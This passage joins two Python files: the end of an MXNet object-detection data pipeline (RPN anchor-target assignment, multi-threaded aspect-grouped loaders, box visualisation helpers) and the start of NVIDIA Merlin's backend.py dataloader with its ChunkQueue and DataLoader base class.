return valid_index, all_anchor[valid_index]
def _scatter_valid_anchor(self, valid_index, cls_label, reg_target, reg_weight):
num_anchor = self.__num_anchor
all_cls_label = np.full(shape=(num_anchor,), fill_value=-1, dtype=np.float32)
all_reg_target = np.zeros(shape=(num_anchor, 4), dtype=np.float32)
all_reg_weight = np.zeros(shape=(num_anchor, 4), dtype=np.float32)
all_cls_label[valid_index] = cls_label
all_reg_target[valid_index] = reg_target
all_reg_weight[valid_index] = reg_weight
return all_cls_label, all_reg_target, all_reg_weight
def apply(self, input_record):
    """Assign RPN classification labels and bbox-regression targets.

    Reads "im_info" and "gt_bbox" (padded (N, 5) float32, last column is the
    class id, x1 == -1 marks padding) from input_record; writes
    "rpn_cls_label", "rpn_reg_target" and "rpn_reg_weight" laid out in
    (channel, fh, fw) feature-map order, and also returns the three arrays.
    """
    p = self.p

    im_info = input_record["im_info"]
    gt_bbox = input_record["gt_bbox"]
    assert isinstance(gt_bbox, np.ndarray)
    assert gt_bbox.dtype == np.float32
    assert gt_bbox.shape[1] == 5

    # drop padded gt rows (marked with x1 == -1)
    valid = np.where(gt_bbox[:, 0] != -1)[0]
    gt_bbox = gt_bbox[valid]
    # split off the class column before using the boxes
    gt_class = gt_bbox[:, -1].copy()
    gt_bbox = gt_bbox[:, :4].copy()

    cls_label = None
    anchor_label = None
    valid_index, valid_anchor = self._gather_valid_anchor(im_info)
    if p.generate.use_groupsoftmax:
        # map dataset class ids to RPN group ids before assignment
        gt_class = p.gtclass2rpn(gt_class)
        cls_label, anchor_label = \
            self._assign_label_to_anchor_group(valid_anchor, gt_bbox, gt_class,
                                               p.assign.neg_thr, p.assign.pos_thr, p.assign.min_pos_thr)
    else:
        cls_label, anchor_label = \
            self._assign_label_to_anchor(valid_anchor, gt_bbox,
                                         p.assign.neg_thr, p.assign.pos_thr, p.assign.min_pos_thr)
    # subsample to a fixed anchor budget per image (mutates cls_label in place)
    self._sample_anchor(cls_label, p.sample.image_anchor, p.sample.pos_fraction)
    reg_target, reg_weight = self._cal_anchor_target(cls_label, valid_anchor, gt_bbox, anchor_label)
    # scatter the valid subset back onto the full anchor grid
    cls_label, reg_target, reg_weight = \
        self._scatter_valid_anchor(valid_index, cls_label, reg_target, reg_weight)

    # feature-map layout follows the image aspect (long side first if h >= w)
    h, w = im_info[:2]
    if h >= w:
        fh, fw = p.generate.long, p.generate.short
    else:
        fh, fw = p.generate.short, p.generate.long
    input_record["rpn_cls_label"] = cls_label.reshape((fh, fw, -1)).transpose(2, 0, 1).reshape(-1)
    input_record["rpn_reg_target"] = reg_target.reshape((fh, fw, -1)).transpose(2, 0, 1)
    input_record["rpn_reg_weight"] = reg_weight.reshape((fh, fw, -1)).transpose(2, 0, 1)

    return input_record["rpn_cls_label"], \
           input_record["rpn_reg_target"], \
           input_record["rpn_reg_weight"]
class RenameRecord(DetectionAugmentation):
    """Renames keys of the input record according to an {old: new} mapping."""

    def __init__(self, mapping):
        super().__init__()
        # mapping: dict of {old_key: new_key}
        self.mapping = mapping

    def apply(self, input_record):
        """Rename keys of input_record in place.

        Uses pop-then-assign: the previous assign-then-delete sequence
        dropped the entry entirely whenever old_key == new_key.
        """
        for k, new_k in self.mapping.items():
            input_record[new_k] = input_record.pop(k)
class Loader(mx.io.DataIter):
    """
    Loader is now a 3-thread design,
    Loader.next is called in the main thread,
    multiple worker threads are responsible for performing transform,
    a collector thread is responsible for converting numpy array to mxnet array.
    """

    def __init__(self, roidb, transform, data_name, label_name, batch_size=1,
                 shuffle=False, num_worker=None, num_collector=None,
                 worker_queue_depth=None, collector_queue_depth=None, kv=None, valid_count=-1):
        """
        This Iter will provide roi data to Fast R-CNN network
        :param roidb: must be preprocessed
        :param batch_size:
        :param shuffle: bool
        :return: Loader
        """
        super().__init__(batch_size=batch_size)
        if kv:
            (self.rank, self.num_worker) = (kv.rank, kv.num_workers)
        else:
            (self.rank, self.num_worker) = (0, 1)
        # NOTE(review): self.num_worker set above from kv.num_workers is
        # overwritten below by the thread-count argument — confirm intended.
        # data processing utilities
        if isinstance(transform, dict):
            self.transform = transform["sample"]
            self.batch_transform = transform["batch"]
        else:
            self.transform = transform
            self.batch_transform = list()
        # save parameters as properties
        self.roidb = roidb
        self.shuffle = shuffle
        # infer properties from roidb
        self.total_index = np.arange(len(roidb))
        # valid_count < len(roidb) allows padding records that do not count
        # toward an epoch (used for multi-rank sharding)
        self.valid_count = valid_count if valid_count != -1 else len(roidb)
        # decide data and label names
        self.data_name = data_name
        self.label_name = label_name
        # status variable for synchronization between get_data and get_label
        self._cur = 0
        self.data = None
        self.label = None
        self.debug = False
        self.result = None
        # multi-thread settings
        self.num_worker = num_worker
        self.num_collector = num_collector
        self.index_queue = Queue()
        self.data_queue = Queue(maxsize=worker_queue_depth)
        self.result_queue = Queue(maxsize=collector_queue_depth)
        self.workers = None
        self.collectors = None
        # get first batch to fill in provide_data and provide_label
        self._thread_start()
        self.load_first_batch()
        self.reset()

    @property
    def index(self):
        # only the first valid_count entries count toward an epoch
        return self.total_index[:self.valid_count]

    @property
    def total_record(self):
        # records per epoch, truncated to whole batches
        return len(self.index) // self.batch_size * self.batch_size

    @property
    def provide_data(self):
        # name/shape pairs inferred from the most recently produced batch
        return [(k, v.shape) for k, v in zip(self.data_name, self.data)]

    @property
    def provide_label(self):
        return [(k, v.shape) for k, v in zip(self.label_name, self.label)]

    def _insert_queue(self):
        # enqueue one index batch per step; the final partial batch is dropped
        for i in range(0, len(self.index), self.batch_size):
            batch_index = self.index[i:i + self.batch_size]
            if len(batch_index) == self.batch_size:
                self.index_queue.put(batch_index)

    def _thread_start(self):
        # spawn daemon worker (transform) and collector (numpy->mxnet) threads
        self.workers = \
            [Thread(target=self.worker, args=[self.roidb, self.index_queue, self.data_queue])
             for _ in range(self.num_worker)]
        for worker in self.workers:
            worker.daemon = True
            worker.start()
        self.collectors = [Thread(target=self.collector, args=[]) for _ in range(self.num_collector)]
        for c in self.collectors:
            c.daemon = True
            c.start()

    def reset(self):
        """Rewind the iterator, reshuffle if requested and refill the queue."""
        self._cur = 0
        if self.shuffle:
            np.random.shuffle(self.total_index)
        self._insert_queue()

    def iter_next(self):
        # True while a full batch remains in the current epoch
        return self._cur + self.batch_size <= len(self.index)

    def load_first_batch(self):
        # prime the pipeline once so provide_data/provide_label can be inferred
        self.index_queue.put(range(self.batch_size))
        self.next()

    def load_batch(self):
        self._cur += self.batch_size
        result = self.result_queue.get()
        return result

    def next(self):
        """Return the next mx.io.DataBatch or raise StopIteration."""
        if self.debug and self.result is not None:
            # debug mode: replay the same batch forever
            return self.result
        if self.iter_next():
            # print("[worker] %d" % self.data_queue.qsize())
            # print("[collector] %d" % self.result_queue.qsize())
            result = self.load_batch()
            self.data = result.data
            self.label = result.label
            self.result = result
            return result
        else:
            raise StopIteration

    def worker(self, roidb, index_queue, data_queue):
        """Worker-thread loop: apply sample transforms, stack into arrays,
        apply batch transforms and hand the dict to a collector."""
        while True:
            batch_index = index_queue.get()
            records = []
            for index in batch_index:
                # copy so transforms never mutate the shared roidb
                roi_record = roidb[index].copy()
                for trans in self.transform:
                    trans.apply(roi_record)
                records.append(roi_record)
            data_batch = {}
            for name in self.data_name + self.label_name:
                data_batch[name] = np.ascontiguousarray(np.stack([r[name] for r in records]))
            for trans in self.batch_transform:
                trans.apply(data_batch)
            data_queue.put(data_batch)

    def collector(self):
        """Collector-thread loop: wrap numpy batches into mx.io.DataBatch."""
        while True:
            record = self.data_queue.get()
            data = [mx.nd.from_numpy(record[name], zero_copy=True) for name in self.data_name]
            label = [mx.nd.from_numpy(record[name], zero_copy=True) for name in self.label_name]
            provide_data = [(k, v.shape) for k, v in zip(self.data_name, data)]
            provide_label = [(k, v.shape) for k, v in zip(self.label_name, label)]
            data_batch = mx.io.DataBatch(data=data,
                                         label=label,
                                         provide_data=provide_data,
                                         provide_label=provide_label)
            self.result_queue.put(data_batch)
class SequentialLoader(mx.io.DataIter):
    """Drains a list of child iterators one after another, presenting them
    as a single mx.io.DataIter."""

    def __init__(self, iters):
        super().__init__()
        self.iters = iters
        self.exhausted = [False] * len(iters)

    def __getattr__(self, attr):
        # delegate unknown keys to underlying iterators
        active = self.exhausted.index(False)
        return getattr(self.iters[active], attr)

    def next(self):
        """Return the next batch from the first non-exhausted child; raise
        StopIteration once every child is drained."""
        while not all(self.exhausted):
            active = self.exhausted.index(False)
            try:
                return self.iters[active].next()
            except StopIteration:
                self.exhausted[active] = True
        raise StopIteration

    def reset(self):
        for child in self.iters:
            child.reset()
        self.exhausted = [False] * len(self.iters)

    @property
    def provide_data(self):
        return self.iters[0].provide_data

    @property
    def provide_label(self):
        return self.iters[0].provide_label
class AnchorLoader(mx.io.DataIter):
    """Aspect-grouped loader: images are split into vertical (h >= w) and
    horizontal groups, one Loader is built per non-empty group, and the two
    are drained sequentially so a batch never mixes layouts."""

    def __init__(self, roidb, transform, data_name, label_name, batch_size=1,
                 shuffle=False, num_worker=12, num_collector=4, worker_queue_depth=4,
                 collector_queue_depth=4, kv=None):
        super().__init__(batch_size=batch_size)
        v_roidb, h_roidb = self.roidb_aspect_group(roidb)
        if kv:
            rank, num_rank = kv.rank, kv.num_workers
        else:
            rank, num_rank = 0, 1
        if num_rank > 1:
            # shard each aspect group across ranks; records appended beyond
            # valid_count only pad the shard and do not count toward an epoch
            v_part = len(v_roidb) // num_rank
            v_remain = len(v_roidb) % num_rank
            v_roidb_part = v_roidb[rank * v_part:(rank + 1) * v_part]
            v_valid_count = len(v_roidb_part)
            # BUG FIX: when the group divides evenly, v_remain == 0 and the
            # old unconditional slice roidb[-0:] was the WHOLE list, so every
            # rank appended a spurious duplicate record; pad only from a
            # genuine remainder.
            if v_remain > 0:
                v_roidb_part += v_roidb[-v_remain:][rank:rank + 1]
            h_part = len(h_roidb) // num_rank
            h_remain = len(h_roidb) % num_rank
            h_roidb_part = h_roidb[rank * h_part:(rank + 1) * h_part]
            h_valid_count = len(h_roidb_part)
            if h_remain > 0:
                h_roidb_part += h_roidb[-h_remain:][rank:rank + 1]
        else:
            v_roidb_part = v_roidb
            v_valid_count = len(v_roidb)
            h_roidb_part = h_roidb
            h_valid_count = len(h_roidb)
        loaders = []
        if len(h_roidb_part) >= batch_size:
            h_loader = Loader(roidb=h_roidb_part,
                              valid_count=h_valid_count,
                              transform=transform,
                              data_name=data_name,
                              label_name=label_name,
                              batch_size=batch_size,
                              shuffle=shuffle,
                              num_worker=num_worker,
                              num_collector=num_collector,
                              worker_queue_depth=worker_queue_depth,
                              collector_queue_depth=collector_queue_depth,
                              kv=kv)
            loaders.append(h_loader)
        if len(v_roidb_part) >= batch_size:
            v_loader = Loader(roidb=v_roidb_part,
                              valid_count=v_valid_count,
                              transform=transform,
                              data_name=data_name,
                              label_name=label_name,
                              batch_size=batch_size,
                              shuffle=shuffle,
                              num_worker=num_worker,
                              num_collector=num_collector,
                              worker_queue_depth=worker_queue_depth,
                              collector_queue_depth=collector_queue_depth,
                              kv=kv)
            loaders.append(v_loader)
        assert len(loaders) > 0, "at least one loader should be constructed"
        self.__loader = SequentialLoader(loaders)

    @property
    def total_record(self):
        # sum of whole-batch record counts over all child loaders
        return sum([it.total_record for it in self.__loader.iters])

    def __len__(self):
        return self.total_record

    def __getattr__(self, attr):
        # delegate unknown keys to underlying iterators
        return getattr(self.__loader, attr)

    def next(self):
        return self.__loader.next()

    def reset(self):
        return self.__loader.reset()

    @staticmethod
    def roidb_aspect_group(roidb):
        """Split roidb into (vertical, horizontal) lists by image aspect."""
        v_roidb, h_roidb = [], []
        for roirec in roidb:
            if roirec["h"] >= roirec["w"]:
                v_roidb.append(roirec)
            else:
                h_roidb.append(roirec)
        return v_roidb, h_roidb
def visualize_anchor_loader(batch_data):
    """Display the first image of a batch with its gt boxes drawn in green;
    blocks until a key is pressed."""
    img = batch_data.data[0][0].asnumpy().astype(np.uint8).transpose((1, 2, 0)).copy()
    boxes = batch_data.data[2][0].asnumpy().astype(np.int32)
    for box in boxes:
        cv2.rectangle(img, tuple(box[:2]), tuple(box[2:4]), color=(0, 255, 0))
    cv2.imshow("image", img)
    cv2.waitKey()
def visualize_anchor_loader_old(batch_data):
    """Legacy variant: gt boxes come from the batch labels (index 3) instead
    of the data slots; blocks until a key is pressed."""
    img = batch_data.data[0][0].asnumpy().astype(np.uint8).transpose((1, 2, 0)).copy()
    boxes = batch_data.label[3][0].asnumpy().astype(np.int32)
    for box in boxes:
        cv2.rectangle(img, tuple(box[:2]), tuple(box[2:4]), color=(0, 255, 0))
    cv2.imshow("image", img)
    cv2.waitKey()
def visualize_original_input(roirec):
    """Load the original image from disk and display it with its gt boxes;
    blocks until a key is pressed."""
    img = cv2.imread(roirec["image_url"], cv2.IMREAD_COLOR)
    boxes = roirec["gt_bbox"]
    for box in boxes:
        cv2.rectangle(img, tuple(box[:2]), tuple(box[2:4]), color=(0, 255, 0))
    cv2.imshow("image", img)
    cv2.waitKey()
|
backend.py | #
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import math
import queue
import threading
import warnings
from collections import OrderedDict
import numpy as np
try:
import cupy as cp
except ImportError:
cp = np
from merlin.core.dispatch import (
HAS_GPU,
annotate,
concat,
generate_local_seed,
is_list_dtype,
make_df,
pull_apart_list,
)
from merlin.io.shuffle import shuffle_df
from merlin.models.loader.dataframe_iter import DataFrameIter
from merlin.schema import Tags
def _num_steps(num_samples, step_size):
    """Return the number of steps of size `step_size` needed to cover
    `num_samples`, rounding the final partial step up."""
    return math.ceil(num_samples / step_size)
class ChunkQueue:
    """This class takes partitions (parts) from an NVTabular dataset
    and concatenates them into a cudf dataframe "chunk". This chunk
    is subsequently transformed into its tensor representation using
    the iterator's transform.

    Parameters
    -----------
    qsize: int
        Max number of elements to hold in the buffer at once
    num_parts : int
        number of partitions from the iterator, an NVTabular Dataset to concatenate into a "chunk"
    shuffle : bool
        enable/disable chunk-level shuffling
    put_wait: float
        amount of timeout to wait for a full queue to open up
        before checking for errors and trying again
    """

    def __init__(self, dataloader, qsize, num_parts=1, shuffle=False, put_wait=1e-6, epochs=1):
        self.num_parts = num_parts
        self.shuffle = shuffle
        self.put_wait = put_wait
        self.q_out = queue.Queue(qsize)
        self._stop_event = threading.Event()
        self.itr = dataloader._data_iter(epochs)
        self.dataloader = dataloader

    def __len__(self):
        return len(self.itr)

    @property
    def stopped(self):
        # True once stop() has been requested by the consumer
        return self._stop_event.is_set()

    @property
    def empty(self):
        return self.q_out.empty()

    def get(self):
        # blocking read of the next tensorized chunk (or a forwarded Exception)
        return self.q_out.get()

    def put(self, packet):
        """Enqueue `packet`, retrying on a full queue; return True if the
        queue was stopped before the packet could be enqueued, else False."""
        while True:
            if self.stopped:
                return True
            try:
                self.q_out.put(packet, timeout=self.put_wait)
                return False
            except queue.Full:
                continue

    @annotate("batch", color="darkgreen", domain="nvt_python")
    def batch(self, itr):
        """
        iterates through gpu_mem_frac size chunks of dataset
        and concatenates every `num_parts` of them.
        """
        current = []
        while True:
            try:
                value = next(itr)
            except StopIteration:
                # flush whatever partial group remains
                if len(current) > 0:
                    yield current
                break
            current.append(value)
            if len(current) == self.num_parts:
                yield current
                current = []

    @annotate("chunk_logic", color="darkgreen", domain="nvt_python")
    def chunk_logic(self, itr):
        """Concatenate parts into chunks, carrying the sub-batch-size spill
        forward, optionally shuffling, tensorizing and enqueueing each."""
        spill = None
        for chunks in self.batch(itr):
            if self.stopped:
                return

            if spill is not None and not spill.empty:
                chunks.insert(0, spill)

            chunks = concat(chunks)
            chunks.reset_index(drop=True, inplace=True)
            chunks, spill = self.get_batch_div_chunk(chunks, self.dataloader.batch_size)
            if self.shuffle:
                chunks = shuffle_df(chunks)

            if len(chunks) > 0:
                chunks = self.dataloader.make_tensors(chunks, self.dataloader._use_nnz)
                # put returns True if buffer is stopped before
                # packet can be put in queue. Keeps us from
                # freezing on a put on a full queue
                if self.put(chunks):
                    return
            chunks = None
        # takes care final batch, which is less than batch size
        if not self.dataloader.drop_last and spill is not None and not spill.empty:
            spill = self.dataloader.make_tensors(spill, self.dataloader._use_nnz)
            self.put(spill)

    @annotate("load_chunks", color="darkgreen", domain="nvt_python")
    def load_chunks(self, dev):
        """Producer entry point run on the loader thread; any exception is
        forwarded through the queue to the consumer."""
        try:
            itr = iter(self.itr)
            if self.dataloader.device != "cpu":
                with self.dataloader._get_device_ctx(dev):
                    self.chunk_logic(itr)
            else:
                self.chunk_logic(itr)
        except Exception as e:  # pylint: disable=broad-except
            self.put(e)

    # For when an iterator is stopped before iteration is complete.
    def stop(self):
        self._stop_event.set()
        # TODO: should we be clearing? I can imagine a world where
        # you want the thread to stop but still want to grab
        # data out of the buffer
        self.q_out.queue.clear()

    def start(self):
        self._stop_event.clear()

    def get_batch_div_chunk(self, chunks, batch_size):
        """Split `chunks` into (whole-batch-multiple part, remainder spill)."""
        # TODO: is there a way to do this using cupy?
        spill_idx = int(chunks.shape[0] / batch_size) * batch_size
        spill = make_df(chunks.iloc[spill_idx:])
        chunks = make_df(chunks.iloc[:spill_idx])
        if not chunks.empty:
            chunks.reset_index(drop=True, inplace=True)
        if not spill.empty:
            spill.reset_index(drop=True, inplace=True)
        return chunks, spill
def _get_dataset_schema(dataset):
return dataset.schema if hasattr(dataset, "schema") else None
# TODO: implement as metaclass and assign methods to children
# to avoid having to do Dataset.<method> calls?
class DataLoader:
    """Framework-agnostic base dataloader: a background thread turns dataset
    partitions into tensor chunks (via ChunkQueue) while the consumer iterates
    batches off the queue. Subclasses supply the framework-specific tensor
    operations (_to_tensor, _split_fn, _get_device_ctx, dtypes, ...)."""

    # whether subclasses want explicit nnz counts alongside list offsets
    _use_nnz = False

    def __init__(
        self,
        dataset,
        batch_size,
        shuffle,
        cat_names=None,
        cont_names=None,
        label_names=None,
        seed_fn=None,
        parts_per_chunk=1,
        device=None,
        global_size=None,
        global_rank=None,
        drop_last=False,
        sparse_names=None,
        sparse_max=None,
        sparse_as_dense=False,
    ):
        self.data = dataset
        self.schema = _get_dataset_schema(dataset)
        # self.data is ddf format
        self.indices = cp.arange(self.data.npartitions)
        self.drop_last = drop_last
        self.device = (device or 0) if HAS_GPU else "cpu"
        self.sparse_names = sparse_names or []
        self.sparse_max = sparse_max or {}
        self.sparse_as_dense = sparse_as_dense
        self.global_size = global_size or 1
        self.global_rank = global_rank or 0
        self._epochs = 1

        # column names fall back to the schema's tags when not given explicitly
        self.cat_names = cat_names or (
            self.schema.select_by_tag(Tags.CATEGORICAL).excluding_by_tag(Tags.TARGET).column_names
            if self.schema
            else []
        )
        self.cont_names = cont_names or (
            self.schema.select_by_tag(Tags.CONTINUOUS).excluding_by_tag(Tags.TARGET).column_names
            if self.schema
            else []
        )
        self.label_names = label_names or (
            self.schema.select_by_tag(Tags.TARGET).column_names if self.schema else []
        )

        if not self.cat_names and not self.cont_names:
            raise ValueError(
                "Neither Categorical or Continuous columns were found by the dataloader. "
                "You must either specify the cat_names, cont_names and "
                "label_names properties or supply a schema.pbtxt file in dataset directory."
            )

        self.batch_size = batch_size
        self.shuffle = shuffle
        self.seed_fn = seed_fn

        self.num_rows_processed = 0

        self.parts_per_chunk = parts_per_chunk
        self.shuffle = shuffle
        self.__buff = None
        self.__buff_len = None
        self._batch_itr = None
        self._workers = None

    @property
    def _buff(self):
        """Lazily created ChunkQueue shared with the producer thread."""
        if self.__buff is None:
            # we set size of chunk queue to 1 we only want one chunk in queue at a time.
            self.__buff = ChunkQueue(
                self, 1, num_parts=self.parts_per_chunk, shuffle=self.shuffle, epochs=self._epochs
            )
        return self.__buff

    @property
    def _buff_len(self):
        if self.__buff_len is None:
            # run once instead of every time len called
            self.__buff_len = len(self._buff)
        return self.__buff_len

    def epochs(self, epochs=1):
        """Return a shallow copy of this loader configured for `epochs`
        passes over the data (self is returned unchanged when equal)."""
        if epochs == self._epochs:
            return self
        new_dataloader = copy.copy(self)
        new_dataloader._set_epochs(epochs)
        return new_dataloader

    def _set_epochs(self, epochs):
        # drop the existing buffer so the next iteration rebuilds it
        self.stop()
        self.__buff = None
        self.__buff_len = None
        self._epochs = epochs

    def __len__(self):
        """Number of batches; the trailing partial batch is excluded when
        drop_last is set."""
        batches = _num_steps(self._buff_len, self.batch_size)
        if self.drop_last and self._buff_len % self.batch_size > 0:
            batches = batches - 1
        return batches

    @property
    def _working(self):
        # True while any producer thread is still alive
        if self._workers is not None:
            return any(t.is_alive() for t in self._workers)
        return False

    def stop(self):
        """Halt the producer thread(s) and clear all buffered chunks."""
        # TODO: raise warning or even error if condition
        # isn't met?
        if self._workers is not None:
            if not self._buff.stopped:
                self._buff.stop()
            for t in self._workers:
                t.join()
            # remove joined threads from list
            self._workers = None
        self._buff.q_out.queue.clear()
        self._batch_itr = None

    def _gather_indices_for_dev(self, dev):
        """Return this rank's slice of the partition indices."""
        # this should be self.indices divided by total processes, global set
        if len(self.indices) < self.global_size:
            warnings.warn(
                f"""You have more processes({self.global_size}) than dataset
                    partitions({len(self.indices)}), reduce the number of processes."""
            )
            raise IndexError
        per_worker = _num_steps(len(self.indices), self.global_size)
        # identify process rank out of all processes (not local rank)
        start = self.global_rank * per_worker
        return self.indices[start : start + per_worker].tolist()

    @annotate("_shuffle_indices", color="darkgreen", domain="nvt_python")
    def _shuffle_indices(self):
        """Shuffle partition indices, seeding identically across ranks so
        every process shuffles the same way."""
        generate_local_seed(self.global_rank, self.global_size)
        if self.seed_fn:
            new_seed = self.seed_fn()
            cp.random.seed(new_seed)
        cp.random.shuffle(self.indices)
        generate_local_seed(self.global_rank, self.global_size)

    def __iter__(self):
        """Restart iteration: reset state and launch the producer thread."""
        self.stop()
        self.num_rows_processed = 0
        if self._buff.stopped:
            self._buff.start()

        # shuffle partition indices to bring disparate
        # parts of the dataset "close" to one another
        if self.shuffle:
            self._shuffle_indices()

        # build and start new threads for loading and
        # concatenating data
        self._workers = []
        t = threading.Thread(target=self._buff.load_chunks, args=(self.device,))
        t.daemon = True
        t.start()
        self._workers.append(t)
        return self

    def __next__(self):
        return self._get_next_batch()

    def _data_iter(self, epochs):
        # iterate only this rank's partitions
        indices = self._gather_indices_for_dev(0)
        if hasattr(self.data, "to_iter"):
            return self.data.to_iter(indices=indices, epochs=epochs)
        return DataFrameIter(self.data, epochs=epochs)

    def _fetch_chunk(self):
        """Pull the next chunk off the queue; a forwarded producer exception
        stops the loader and is re-raised here."""
        chunks = self._buff.get()
        if isinstance(chunks, Exception):
            self.stop()
            raise chunks
        self._batch_itr = iter(chunks)

    def _get_next_batch(self):
        """
        adding this cheap shim so that we can call this
        step without it getting overridden by the
        framework-specific parent class's `__next__` method.
        TODO: can this be better solved with a metaclass
        implementation? My gut is that we don't actually
        necessarily *want*, in general, to be overriding
        __next__ and __iter__ methods
        """
        # we've never initialized, do that now
        # need this because tf.keras.Model.fit will
        # call next() cold
        if self._workers is None:
            DataLoader.__iter__(self)

        # get the first chunks
        if self._batch_itr is None:
            self._fetch_chunk()

        # try to iterate through existing batches
        try:
            batch = next(self._batch_itr)
        except StopIteration:
            # anticipate any more chunks getting created
            # if not, raise the StopIteration
            if not self._working and self._buff.empty:
                self._workers = None
                self._batch_itr = None
                raise

            # otherwise get the next chunks and return
            # the first batch
            self._fetch_chunk()
            batch = next(self._batch_itr)
        # if batch[0] is empty but other exist
        for sub in batch:
            if sub is not None and len(sub) > 0:
                self.num_rows_processed += len(sub)
                break
        return batch

    @annotate("make_tensors", color="darkgreen", domain="nvt_python")
    def make_tensors(self, gdf, use_nnz=False):
        """Convert a dataframe chunk into a list of per-batch
        framework-specific (features, labels) outputs."""
        split_idx = self._get_segment_lengths(len(gdf))

        # map from big chunk to framework-specific tensors
        chunks = self._create_tensors(gdf)

        # if we have any offsets, calculate nnzs up front
        if len(chunks) == 4:
            offsets = chunks[-1]
            if use_nnz:
                nnzs = offsets[1:] - offsets[:-1]
            chunks = chunks[:-1]

        # split them into batches and map to the framework-specific output format
        batches = [[] for _ in range(len(split_idx))]
        offset_idx = 0
        for chunk in chunks:
            lists = None
            if isinstance(chunk, tuple):
                chunk, lists = chunk

            if len(split_idx) > 1 and chunk is not None:
                chunk = self._split_fn(chunk, split_idx)
            else:
                chunk = [chunk for _ in split_idx]

            if lists is not None:
                num_list_columns = len(lists)

                # grab the set of offsets and nnzs corresponding to
                # the list columns from this chunk
                chunk_offsets = offsets[:, offset_idx : offset_idx + num_list_columns]
                if use_nnz:
                    chunk_nnzs = nnzs[:, offset_idx : offset_idx + num_list_columns]
                offset_idx += num_list_columns

                # split them into batches, including an extra 1 on the offsets
                # so we know how long the very last element is
                batch_offsets = self._split_fn(chunk_offsets, split_idx + [1])
                if use_nnz and len(split_idx) > 1:
                    batch_nnzs = self._split_fn(chunk_nnzs, split_idx)
                elif use_nnz:
                    batch_nnzs = [chunk_nnzs]
                else:
                    batch_nnzs = [None] * (len(batch_offsets) - 1)

                # group all these indices together and iterate through
                # them in batches to grab the proper elements from each
                # values tensor
                chunk = zip(chunk, batch_offsets[:-1], batch_offsets[1:], batch_nnzs)

            for n, c in enumerate(chunk):
                if isinstance(c, tuple):
                    c, off0s, off1s, _nnzs = c
                    offsets_split_idx = [1 for _ in range(num_list_columns)]
                    off0s = self._split_fn(off0s, offsets_split_idx, axis=1)
                    off1s = self._split_fn(off1s, offsets_split_idx, axis=1)
                    if use_nnz:
                        _nnzs = self._split_fn(_nnzs, offsets_split_idx, axis=1)

                    # TODO: does this need to be ordereddict?
                    batch_lists = {}
                    for k, (column_name, values) in enumerate(lists.items()):
                        off0, off1 = off0s[k], off1s[k]
                        if use_nnz:
                            nnz = _nnzs[k]

                        # need to grab scalars for TF case
                        if len(off0.shape) == 1:
                            start, stop = off0[0], off1[0]
                        elif len(off0.shape) == 2:
                            start, stop = off0[0, 0], off1[0, 0]
                        else:
                            print(off0, off1)
                            raise ValueError
                        value = values[int(start) : int(stop)]
                        # rebase offsets to this batch (or use nnz counts)
                        index = off0 - start if not use_nnz else nnz
                        batch_lists[column_name] = (value, index)
                    c = (c, batch_lists)

                batches[n].append(c)
        return [self._handle_tensors(*batch) for batch in batches]

    def _get_segment_lengths(self, num_samples):
        """
        Helper function to build indices to pass
        to <torch|tf>.split functions for breaking
        up into batches
        """
        num_full_batches = _num_steps(num_samples, self.batch_size) - 1
        idx = [self.batch_size for _ in range(num_full_batches)]
        idx.append(num_samples - num_full_batches * self.batch_size)
        return idx

    def _to_sparse_tensor(self, values_offset, column_name):
        """
        Create a sparse representation of the input tensor.
        values_offset is either a tensor or a tuple of tensor, offset.
        """
        seq_limit = self.sparse_max[column_name]
        values, offsets, diff_offsets, num_rows = self._pull_values_offsets(values_offset)
        max_seq_len = self._get_max_seq_len(diff_offsets)
        if max_seq_len > seq_limit:
            raise ValueError(
                "The default sequence length has been configured "
                + f"to {seq_limit} but the "
                + f"largest sequence in this batch have {max_seq_len} length"
            )
        return self._build_sparse_tensor(values, offsets, diff_offsets, num_rows, seq_limit)

    def _to_tensor(self, gdf, dtype=None):
        """
        One of the mandatory functions a child class needs
        to implement. Maps from a cudf DataFrame to a
        tensor in the appropriate library, with an optional
        dtype kwarg to do explicit casting if need be
        """
        raise NotImplementedError

    def _get_device_ctx(self, dev):
        """
        One of the mandatory functions a child class needs
        to implement. Maps from a GPU index to a framework
        context object for placing tensors on specific GPUs
        """
        raise NotImplementedError

    def _split_fn(self, tensor, idx, axis=0):
        # framework-specific tensor split; must be provided by subclasses
        raise NotImplementedError

    @property
    def _LONG_DTYPE(self):
        # framework-specific integer dtype; provided by subclasses
        raise NotImplementedError

    @property
    def _FLOAT32_DTYPE(self):
        # framework-specific float dtype; provided by subclasses
        raise NotImplementedError

    def _separate_list_columns(self, gdf):
        """Partition a dataframe's columns into (scalars, lists)."""
        lists, scalars = [], []
        for col in gdf.columns:
            if is_list_dtype(gdf[col]):
                lists.append(col)
            else:
                scalars.append(col)
        return scalars, lists

    @annotate("_create_tensors", color="darkgreen", domain="nvt_python")
    def _create_tensors(self, gdf):
        """
        Breaks a dataframe down into the relevant
        categorical, continuous, and label tensors.
        Can be overrideen
        """
        workflow_nodes = (self.cat_names, self.cont_names, self.label_names)
        dtypes = (self._LONG_DTYPE, self._FLOAT32_DTYPE, self._FLOAT32_DTYPE)
        tensors = []
        offsets = make_df(device=self.device)
        for column_names, dtype in zip(workflow_nodes, dtypes):
            if len(column_names) == 0:
                tensors.append(None)
                continue

            if hasattr(column_names, "column_names"):
                column_names = column_names.column_names

            gdf_i = gdf[column_names]
            # free the source columns as we go to limit peak memory
            gdf.drop(columns=column_names, inplace=True)

            scalars, lists = self._separate_list_columns(gdf_i)

            x = None
            if scalars:
                # should always return dict column_name: values, offsets (optional)
                x = self._to_tensor(gdf_i[scalars], dtype)
            if lists:
                list_tensors = OrderedDict()
                for column_name in lists:
                    column = gdf_i.pop(column_name)
                    leaves, col_offsets = pull_apart_list(column)
                    if isinstance(leaves[0], list):
                        # doubly-nested lists: flatten one more level
                        leaves, nest_offsets = pull_apart_list(leaves)
                        col_offsets = nest_offsets.iloc[col_offsets[:]]
                    offsets[column_name] = col_offsets.reset_index(drop=True)
                    list_tensors[column_name] = self._to_tensor(leaves, dtype)
                x = x, list_tensors
            tensors.append(x)

        if not offsets.empty:
            offsets_tensor = self._to_tensor(offsets, self._LONG_DTYPE)
            if len(offsets_tensor.shape) == 1:
